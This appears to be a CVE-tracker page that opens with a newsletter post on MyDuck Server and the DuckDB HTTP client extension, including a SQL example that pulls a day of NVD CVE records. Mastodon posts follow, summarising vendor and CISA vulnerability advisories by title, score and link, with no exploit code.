MyDuck Server is a nascent bridge between MySQL and DuckDB with a goal of enabling high-performance analytics while maintaining MySQL compatibility. It functions by storing data in DuckDB’s OLAP-optimized format while presenting a MySQL-compatible interface, allowing queries to execute [up to 1,000x] faster than traditional MySQL configurations.

The system operates through dual interfaces — a MySQL wire protocol on port 13306 (for traditional MySQL-style queries) and a PostgreSQL-compatible interface on port 15432. (for direct DuckDB SQL execution).

I’m including this mostly for visibility, since I do not run MySQL/MariaDB, and the README — while a tad verbose — is also not super helpful in terms of real examples.

If you are a MySQL/MariaDB shop, this might be something to keep on the radar.

Feet-First 🦆 DB (a.k.a. “DuckDB HTTP Client Extension”)

Photo by Samson Andreea on Pexels.com

The DuckDB HTTP Client extension enables direct HTTP GET and POST requests from within DuckDB queries. After installing and loading via the community extensions repository, you can make HTTP requests that return results directly into DuckDB’s query processing pipeline.

By now, you should know how to install/load extensions:

INSTALL http_client FROM community;LOAD http_client;

The extension provides two main functions: http_get() for GET requests and http_post() for POST requests with optional headers and parameters. The results are returned as structured data that can be further processed using DuckDB’s SQL capabilities.

The extension returns responses in a consistent format that includes:

  • HTTP status code
  • Response reason
  • Response body (typically JSON)
  • Response headers

The response data can be immediately parsed and transformed using DuckDB’s built-in JSON processing capabilities and integrated into larger analytical queries.

The README provides a practical example of this extension’s utility is its ability to interact with spatial data APIs. When combined with DuckDB’s spatial extension, you can fetch GeoJSON data via HTTP and directly process it as geometric objects. This enables seamless integration of remote spatial data sources into DuckDB analytical workflows.

We can show another one, though. Let’s say we want to use DuckDB to analyze a day’s worth of NVD CVE records.

We can grab all of the CVEs for one day and save a temp copy in memory as a table (this reduces the number of times we need to fetch from the API):

CREATE TABLE yesterday AS (WITH   __req AS (    SELECT      http_get(        'https://services.nvd.nist.gov/rest/json/cves/2.0/?pubStartDate=2024-11-08T00:00:00.000&pubEndDate=2024-11-08T23:59:59.000'      ) AS res  ),  __res AS (    SELECT      UNNEST( from_json(((res->>'body')::JSON)->'vulnerabilities', '["json"]') )      AS cves    FROM      __req  ) FROM __res);

We’ll look at that in a second, but be aware that some APIs paginate (NVD does at 2,000 records) and this extension won’t handle that, but you can work around it if you combine this method with some shell scripting.

What that query returns is an array of deeply nexted JSON records:

FROM yesterday LIMIT 3;┌──────────────────────────────────────────────────────────────────────────────┐│                                     cves                                     ││                                     json                                     │├──────────────────────────────────────────────────────────────────────────────┤│ {"cve":{"id":"CVE-2024-47072","sourceIdentifier":"security-advisories@gith…  ││ {"cve":{"id":"CVE-2024-51987","sourceIdentifier":"security-advisories@gith…  ││ {"cve":{"id":"CVE-2024-51998","sourceIdentifier":"security-advisories@gith…  │└──────────────────────────────────────────────────────────────────────────────┘

But DuckDB let’s us work with JSON pretty seamlessly.

It looks like the NVD contractors are milking their contract for all its worth:

FROM yesterdaySELECT   cves->>'cve'->>'vulnStatus' AS vulnStatus,  COUNT() AS ct,  ROUND(COUNT() * 100.0 / SUM(COUNT()) OVER (), 2) AS pctGROUP BY ALL;┌─────────────────────┬───────┬────────┐│     vulnStatus      │  ct   │  pct   ││       varchar       │ int64 │ double │├─────────────────────┼───────┼────────┤│ Awaiting Analysis   │    83 │  65.87 ││ Received            │    34 │  26.98 ││ Undergoing Analysis │     9 │   7.14 │└─────────────────────┴───────┴────────┘

You can add headers, and use getenv(var) to fill in things like API keys.

This is a super fun extension to play with!

FIN

Remember, you can follow and interact with the full text of The Daily Drop’s free posts on Mastodon via @dailydrop.hrbrmstr.dev@dailydrop.hrbrmstr.dev ☮️

https://dailydrop.hrbrmstr.dev/2024/11/09/bonus-drop-67-2024-11-09-if-it-%f0%9f%9a%81-like-a-%f0%9f%a6%86/

#duckdb

##

CVE-2024-11394
(0 None)

EPSS: 0.00%

2 posts

N/A

1 repos

#search_error

thezdi at 2024-11-19T16:52:13.797Z ##

[ZDI-24-1515|CVE-2024-11394] (0Day) Hugging Face Transformers Trax Model Deserialization of Untrusted Data Remote Code Execution Vulnerability (CVSS 8.8; Credit: The_Kernel_Panic) zerodayinitiative.com/advisori

##

thezdi@infosec.exchange at 2024-11-19T16:52:13.000Z ##

[ZDI-24-1515|CVE-2024-11394] (0Day) Hugging Face Transformers Trax Model Deserialization of Untrusted Data Remote Code Execution Vulnerability (CVSS 8.8; Credit: The_Kernel_Panic) zerodayinitiative.com/advisori

##

CVE-2024-11393
(0 None)

EPSS: 0.00%

2 posts

N/A

1 repos

#search_error

thezdi at 2024-11-19T16:51:45.963Z ##

ZDI-24-1514|CVE-2024-11393] (0Day) Hugging Face Transformers MaskFormer Model Deserialization of Untrusted Data Remote Code Execution Vulnerability (CVSS 8.8; Credit: The_Kernel_Panic) zerodayinitiative.com/advisori

##

thezdi@infosec.exchange at 2024-11-19T16:51:45.000Z ##

ZDI-24-1514|CVE-2024-11393] (0Day) Hugging Face Transformers MaskFormer Model Deserialization of Untrusted Data Remote Code Execution Vulnerability (CVSS 8.8; Credit: The_Kernel_Panic) zerodayinitiative.com/advisori

##

CVE-2024-31449
(0 None)

EPSS: 0.04%

1 posts

N/A

CVE-2024-40590
(0 None)

EPSS: 0.00%

1 posts

N/A

screaminggoat@infosec.exchange at 2024-11-13T14:12:42.000Z ##

Additional Fortinet security advisories:

  1. FG-IR-23-396 CVE-2024-23666 (7.5 high) Readonly users could run some sensitive operations (FortiAnalyzer)
  2. FG-IR-24-033 CVE-2024-33510 (4.3 medium) SSLVPN WEB UI Text injection (FortiOS/FortiProxy)
  3. FG-IR-24-098 CVE-2024-31496 (6.7 medium) Stack buffer overflow in CLI command (FortiAnalyzer/FortiManager)
  4. FG-IR-22-155 CVE-2024-40590 (4.8 medium) missing digital certificate validation (FortiPortal)

No mention of exploitation.

#Fortinet #PatchTuesday #CVE #vulnerability #infosec #cybersecurity

##

CVE-2024-10240
(0 None)

EPSS: 0.00%

1 posts

N/A

screaminggoat@infosec.exchange at 2024-11-13T14:08:31.000Z ##

GitLab security advisory: GitLab Patch Release: 17.5.2, 17.4.4, 17.3.7

  1. CVE-2024-9693 (8.5 high) Unauthorized access to Kubernetes cluster agent
  2. CVE-2024-7404 (6.8 medium) Device OAuth flow allows for cross window forgery
  3. requested CVE ID not yet available (6.5 medium) Denial of Service by importing malicious crafted FogBugz import payload
  4. CVE-2024-8648 (6.1 medium) Stored XSS through javascript URL in Analytics dashboards
  5. CVE-2024-8180 (5.4 medium) HTML injection in vulnerability Code flow could lead to XSS on self hosted instances
  6. CVE-2024-10240 (5.3 medium) Information disclosure through an API endpoint

No mention of exploitation.

#GitLab #PatchTuesday #CVE #vulnerability #infosec #cybersecurity

##

cisakevtracker@mastodon.social at 2024-11-12T19:01:24.000Z ##

CVE ID: CVE-2021-41277
Vendor: Metabase
Product: Metabase
Date Added: 2024-11-12
Vulnerability: Metabase GeoJSON API Local File Inclusion Vulnerability
Notes: github.com/metabase/metabase/s ; nvd.nist.gov/vuln/detail/CVE-2
CVE URL: nvd.nist.gov/vuln/detail/CVE-2

##

screaminggoat@infosec.exchange at 2024-11-12T18:39:59.000Z ##

CISA: CISA Adds Five Known Exploited Vulnerabilities to Catalog
Hot off the press!

  • CVE-2024-49039 (8.8 high) Windows Task Scheduler Elevation of Privilege Vulnerability
  • CVE-2024-43451 (6.5 medium) NTLM Hash Disclosure Spoofing Vulnerability
  • CVE-2021-41277 (perfect 10.0 🥳) Metabase GeoJSON API Local File Inclusion Vulnerability
  • CVE-2014-2120 (CVSSv2: 4.3 medium) Cisco Adaptive Security Appliance (ASA) Cross-Site Scripting (XSS) Vulnerability
  • CVE-2021-26086 (5.3 medium) Atlassian Jira Server and Data Center Path Traversal Vulnerability

#cisa #kev #knownexploitedvulnerabilitiescatalog #cisakev #vulnerability #cve #eitw #activeexploitation #infosec #cybersecurity

##

CVE-2024-45819
(0 None)

EPSS: 0.00%

1 posts

N/A

andersonc0d3@infosec.exchange at 2024-11-12T13:47:55.000Z ##

Xen Security Advisory 464 v2 (CVE-2024-45819) - libxl leaks data to PVH guests via ACPI tables

seclists.org/oss-sec/2024/q4/8

##

CVE-2024-27864
(0 None)

EPSS: 0.00%

1 posts

N/A

technotenshi@infosec.exchange at 2024-11-08T18:14:14.000Z ##

New blog post dives deep into a lesser-known macOS attack surface, revealing over 10 fresh sandbox escape vulnerabilities, including CVE-2023-27944, CVE-2023-32414, and CVE-2024-27864. The overlooked XPC services in system frameworks have opened up critical bypass paths for sandbox and SIP restrictions.

jhftss.github.io/A-New-Era-of-

#macOS #Infosec #SandboxEscape #CVE

##

Visit counter For Websites